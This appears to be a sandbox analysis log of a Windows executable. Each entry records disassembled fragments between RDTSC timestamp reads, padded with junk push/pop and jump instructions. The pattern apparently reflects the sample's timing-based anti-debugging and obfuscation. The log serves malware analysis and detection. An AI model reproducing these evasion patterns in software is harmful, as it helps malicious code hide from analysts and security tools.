Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 896756 second address: 89675B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89675B second address: 8967B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743938h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8480743937h 0x00000014 jns 00007F8480743926h 0x0000001a jmp 00007F8480743932h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8967B1 second address: 8967BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8967BB second address: 8967C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8967C3 second address: 8967F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503872h 0x00000008 pushad 0x00000009 jmp 00007F8481503876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410A8 second address: 9410B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480743926h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410B3 second address: 9410B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410B9 second address: 9410BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9410BF second address: 9410DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 941677 second address: 94168E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743931h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94168E second address: 9416C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F8481503872h 0x00000011 push edi 0x00000012 jmp 00007F8481503879h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948209 second address: 94820F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9483E4 second address: 9483F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9483F2 second address: 948406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F848074392Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948980 second address: 948988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948988 second address: 94898D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94898D second address: 9489B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F848150386Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9489B4 second address: 9489BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948CBA second address: 948CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8481503872h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 948CD1 second address: 948CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8480743926h 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F8480743926h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8480743934h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94958C second address: 9495CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F848150386Ah 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 jmp 00007F8481503874h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9495CA second address: 9495CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94985A second address: 94985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949B56 second address: 949B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949B5A second address: 949B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8481503866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949DF5 second address: 949DFF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949DFF second address: 949E0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F8481503866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949E0A second address: 949E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F848074392Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95023B second address: 95023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 954365 second address: 9543A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F848074392Ah 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F848074392Eh 0x00000018 jo 00007F8480743926h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F848074393Bh 0x00000029 jmp 00007F8480743935h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9543A3 second address: 9543A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9543A9 second address: 9543AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953503 second address: 95351E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F8481503866h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F8481503866h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95351E second address: 953526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953526 second address: 95352A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953984 second address: 953992 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953992 second address: 953996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953996 second address: 95399A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953AE6 second address: 953B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8481503879h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jp 00007F848150386Ch 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F848150386Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953B21 second address: 953B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953C83 second address: 953C8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C2E6 second address: 95C311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8480743933h 0x0000000a jnl 00007F8480743926h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F8480743926h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C311 second address: 95C315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C315 second address: 95C319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A673 second address: 95A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A677 second address: 95A680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A680 second address: 95A68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A68A second address: 95A68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95ABC8 second address: 95ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95ABE6 second address: 95ABFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F848074392Ah 0x0000000a popad 0x0000000b jc 00007F848074392Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AE97 second address: 95AE9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B036 second address: 95B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B1C2 second address: 95B1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F848150386Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B1D8 second address: 95B1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F8480743926h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95BA75 second address: 95BA90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F848150386Dh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95BA90 second address: 95BA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C13E second address: 95C142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C142 second address: 95C152 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074395Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C152 second address: 95C156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 960176 second address: 96017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96017C second address: 96018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F848150386Ah 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96018F second address: 9601B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F8480743937h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9601B2 second address: 9601B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96474C second address: 964750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 964750 second address: 96477F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8481503889h 0x0000000c jmp 00007F8481503874h 0x00000011 jmp 00007F848150386Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96477F second address: 964789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 964AA4 second address: 964AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970623 second address: 970629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970629 second address: 97064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503878h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97064B second address: 970668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97079C second address: 9707BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 jno 00007F8481503866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9734DF second address: 9734E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 973687 second address: 973696 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9817CC second address: 9817E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F8480743926h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98160C second address: 981644 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F848150386Eh 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 jmp 00007F8481503873h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 981644 second address: 981660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8480743926h 0x00000009 jmp 00007F848074392Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986951 second address: 98695B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E464 second address: 98E46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300071 second address: 53000AE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743930h 0x00000008 adc al, 00000058h 0x0000000b jmp 00007F848074392Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8480743935h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B000A second address: 52B0032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503877h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0032 second address: 52B009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8480743933h 0x00000013 xor ax, 790Eh 0x00000018 jmp 00007F8480743939h 0x0000001d popfd 0x0000001e mov di, cx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F848074392Ah 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8480743937h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B009C second address: 52B00B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00B4 second address: 52B00F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov al, AEh 0x00000011 push edx 0x00000012 mov dl, ah 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 mov cx, 9651h 0x0000001c mov cx, 468Dh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8480743936h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00F4 second address: 52B00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00FA second address: 52B0116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 23734AD9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0116 second address: 52B0167 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8481503876h 0x00000008 sub cl, 00000068h 0x0000000b jmp 00007F848150386Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov di, si 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a mov ch, F3h 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8481503877h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0167 second address: 52B016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B016D second address: 52B0173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0173 second address: 52B0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0177 second address: 52B017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B017B second address: 52B019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480743939h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B019F second address: 52B01A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01A5 second address: 52B01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01A9 second address: 52B01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01BA second address: 52B01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01BE second address: 52B01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01C2 second address: 52B01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
